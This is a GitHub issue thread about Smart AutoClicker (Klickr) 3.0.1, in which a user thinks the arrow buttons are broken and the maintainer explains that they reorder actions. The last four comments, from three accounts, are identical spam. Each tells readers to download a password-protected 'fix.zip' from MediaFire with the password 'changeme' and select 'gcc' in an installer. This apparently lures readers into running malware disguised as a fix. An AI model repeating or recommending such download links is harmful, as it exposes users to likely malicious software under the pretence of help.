### ISSUE TITLE
Actions box not changing when tapping arrows

### ISSUE THREAD

**Issue by shmaungms** [Nain57/Smart-AutoClicker#475]
### Version of Smart AutoClicker

3.0.1

### Device brand and model

Lenovo tab M11

### Version of your Android OS

14

### Type

Smart scenario

### Describe what happened?

My tablet has auto updated to Klickr 3.0.1
Selecting the up and down arrows OR selecting the x/y box does not change the displayed action.  See the video. I was swiping up and down at the beginning and it was changing then.
https://youtu.be/09hQi2mqqLw

### Describe what should have happened?

The displayed action should have changed

**Comment by Nain57** [comment]
Hi and thank you for your feedback.
Those arrow are not for changing the displayed action, but for reordering the action. As you can see in your video, the indicator changes from 1 to 2 when you press the buttons.

Maybe the icons are not clear enough and need to find new ones

**Comment by shmaungms** [comment]
Ah, OK. I get it now. I may have discovered how it works had I wanted to change the order of the actions. Not sure. This was my initial impressions after discovering Smart Auto Clicker had been updated to Klickr.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
